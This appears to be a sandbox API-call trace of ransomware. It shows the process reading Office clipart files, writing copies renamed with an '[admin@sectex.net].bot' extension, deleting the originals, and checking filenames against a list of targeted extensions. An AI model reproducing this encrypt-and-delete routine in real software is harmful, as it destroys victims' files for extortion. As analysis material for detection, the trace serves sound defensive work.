	[0142.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.563] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=27552) returned 1
	[0142.563] CloseHandle (hObject=0x3b8) returned 1
	[0142.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf")) returned 0x20
	[0142.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.563] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.563] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.565] GetLastError () returned 0x0
	[0142.565] ReadFile (in: hFile=0x3b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x6ba0, lpOverlapped=0x0) returned 1
	[0142.587] WriteFile (in: hFile=0x384, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x6bb0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x6bb0, lpOverlapped=0x0) returned 1
	[0142.588] ReadFile (in: hFile=0x3b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.588] WriteFile (in: hFile=0x384, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.588] SetEndOfFile (hFile=0x384) returned 1
	[0142.588] CloseHandle (hObject=0x384) returned 1
	[0142.588] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.588] SetEndOfFile (hFile=0x3b8) returned 1
	[0142.599] CloseHandle (hObject=0x3b8) returned 1
	[0142.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf")) returned 1
	[0142.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.602] lstrlenW (lpString=".doc") returned 4
	[0142.602] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.602] lstrlenW (lpString=".docx") returned 5
	[0142.602] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.602] lstrlenW (lpString=".pdf") returned 4
	[0142.602] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.602] lstrlenW (lpString=".xls") returned 4
	[0142.602] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.602] lstrlenW (lpString=".xlsx") returned 5
	[0142.602] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.602] lstrlenW (lpString=".ppt") returned 4
	[0142.602] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.602] lstrlenW (lpString=".zip") returned 4
	[0142.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.602] lstrlenW (lpString=".rar") returned 4
	[0142.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.602] lstrlenW (lpString=".bz2") returned 4
	[0142.602] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.602] lstrlenW (lpString=".7z") returned 3
	[0142.602] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.602] lstrlenW (lpString=".dbf") returned 4
	[0142.602] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.602] lstrlenW (lpString=".1cd") returned 4
	[0142.602] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.603] lstrlenW (lpString=".jpg") returned 4
	[0142.603] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.603] lstrlenW (lpString=".doc") returned 4
	[0142.603] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.603] lstrlenW (lpString=".docx") returned 5
	[0142.603] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.603] lstrlenW (lpString=".pdf") returned 4
	[0142.603] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.603] lstrlenW (lpString=".xls") returned 4
	[0142.603] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.603] lstrlenW (lpString=".xlsx") returned 5
	[0142.603] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.603] lstrlenW (lpString=".ppt") returned 4
	[0142.603] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.603] lstrlenW (lpString=".zip") returned 4
	[0142.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.603] lstrlenW (lpString=".rar") returned 4
	[0142.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.603] lstrlenW (lpString=".bz2") returned 4
	[0142.603] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.603] lstrlenW (lpString=".7z") returned 3
	[0142.603] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.603] lstrlenW (lpString=".dbf") returned 4
	[0142.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.603] lstrlenW (lpString=".1cd") returned 4
	[0142.603] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63
	[0142.604] lstrlenW (lpString=".jpg") returned 4
	[0142.604] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.604] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.604] lstrlenW (lpString="BL00932_.WMF") returned 12
	[0142.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.604] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=19476) returned 1
	[0142.604] CloseHandle (hObject=0x3b8) returned 1
	[0142.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf")) returned 0x20
	[0142.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.605] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.605] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.605] GetLastError () returned 0x0
	[0142.605] ReadFile (in: hFile=0x3b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4c14, lpOverlapped=0x0) returned 1
	[0142.607] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4c20, lpOverlapped=0x0) returned 1
	[0142.608] ReadFile (in: hFile=0x3b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.608] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.608] SetEndOfFile (hFile=0x3a0) returned 1
	[0142.608] CloseHandle (hObject=0x3a0) returned 1
	[0142.608] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.608] SetEndOfFile (hFile=0x3b8) returned 1
	[0142.611] CloseHandle (hObject=0x3b8) returned 1
	[0142.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.612] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf")) returned 1
	[0142.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.617] lstrlenW (lpString=".doc") returned 4
	[0142.617] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.617] lstrlenW (lpString=".docx") returned 5
	[0142.617] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.617] lstrlenW (lpString=".pdf") returned 4
	[0142.617] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.617] lstrlenW (lpString=".xls") returned 4
	[0142.617] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.617] lstrlenW (lpString=".xlsx") returned 5
	[0142.617] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.617] lstrlenW (lpString=".ppt") returned 4
	[0142.617] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.617] lstrlenW (lpString=".zip") returned 4
	[0142.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.617] lstrlenW (lpString=".rar") returned 4
	[0142.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.617] lstrlenW (lpString=".bz2") returned 4
	[0142.617] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.617] lstrlenW (lpString=".7z") returned 3
	[0142.617] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.617] lstrlenW (lpString=".dbf") returned 4
	[0142.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.617] lstrlenW (lpString=".1cd") returned 4
	[0142.617] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.617] lstrlenW (lpString=".jpg") returned 4
	[0142.617] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.618] lstrlenW (lpString=".doc") returned 4
	[0142.618] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.618] lstrlenW (lpString=".docx") returned 5
	[0142.618] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.618] lstrlenW (lpString=".pdf") returned 4
	[0142.618] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.618] lstrlenW (lpString=".xls") returned 4
	[0142.618] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.618] lstrlenW (lpString=".xlsx") returned 5
	[0142.618] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.618] lstrlenW (lpString=".ppt") returned 4
	[0142.618] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.618] lstrlenW (lpString=".zip") returned 4
	[0142.618] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.618] lstrlenW (lpString=".rar") returned 4
	[0142.618] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.618] lstrlenW (lpString=".bz2") returned 4
	[0142.618] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.618] lstrlenW (lpString=".7z") returned 3
	[0142.618] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.618] lstrlenW (lpString=".dbf") returned 4
	[0142.618] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.618] lstrlenW (lpString=".1cd") returned 4
	[0142.618] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63
	[0142.618] lstrlenW (lpString=".jpg") returned 4
	[0142.618] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.619] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.619] lstrlenW (lpString="BL00985_.WMF") returned 12
	[0142.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.619] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3768) returned 1
	[0142.619] CloseHandle (hObject=0x3b8) returned 1
	[0142.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf")) returned 0x20
	[0142.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.620] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.620] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.620] GetLastError () returned 0x0
	[0142.620] ReadFile (in: hFile=0x3b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xeb8, lpOverlapped=0x0) returned 1
	[0142.714] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec0, lpOverlapped=0x0) returned 1
	[0142.715] ReadFile (in: hFile=0x3b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.715] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.715] SetEndOfFile (hFile=0x3a0) returned 1
	[0142.715] CloseHandle (hObject=0x3a0) returned 1
	[0142.715] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.715] SetEndOfFile (hFile=0x3b8) returned 1
	[0142.718] CloseHandle (hObject=0x3b8) returned 1
	[0142.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.735] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf")) returned 1
	[0142.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.760] lstrlenW (lpString=".doc") returned 4
	[0142.760] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.760] lstrlenW (lpString=".docx") returned 5
	[0142.760] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.760] lstrlenW (lpString=".pdf") returned 4
	[0142.760] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.760] lstrlenW (lpString=".xls") returned 4
	[0142.760] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.760] lstrlenW (lpString=".xlsx") returned 5
	[0142.760] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.760] lstrlenW (lpString=".ppt") returned 4
	[0142.760] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.760] lstrlenW (lpString=".zip") returned 4
	[0142.760] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.760] lstrlenW (lpString=".rar") returned 4
	[0142.760] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.760] lstrlenW (lpString=".bz2") returned 4
	[0142.760] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.760] lstrlenW (lpString=".7z") returned 3
	[0142.760] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.760] lstrlenW (lpString=".dbf") returned 4
	[0142.760] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.760] lstrlenW (lpString=".1cd") returned 4
	[0142.760] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.761] lstrlenW (lpString=".jpg") returned 4
	[0142.761] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.761] lstrlenW (lpString=".doc") returned 4
	[0142.761] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.761] lstrlenW (lpString=".docx") returned 5
	[0142.761] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.761] lstrlenW (lpString=".pdf") returned 4
	[0142.761] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.761] lstrlenW (lpString=".xls") returned 4
	[0142.761] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.761] lstrlenW (lpString=".xlsx") returned 5
	[0142.761] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.761] lstrlenW (lpString=".ppt") returned 4
	[0142.761] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.761] lstrlenW (lpString=".zip") returned 4
	[0142.761] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.761] lstrlenW (lpString=".rar") returned 4
	[0142.761] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.761] lstrlenW (lpString=".bz2") returned 4
	[0142.761] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.761] lstrlenW (lpString=".7z") returned 3
	[0142.761] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.761] lstrlenW (lpString=".dbf") returned 4
	[0142.761] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.761] lstrlenW (lpString=".1cd") returned 4
	[0142.761] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63
	[0142.761] lstrlenW (lpString=".jpg") returned 4
	[0142.762] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.762] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.762] lstrlenW (lpString="BS00076_.WMF") returned 12
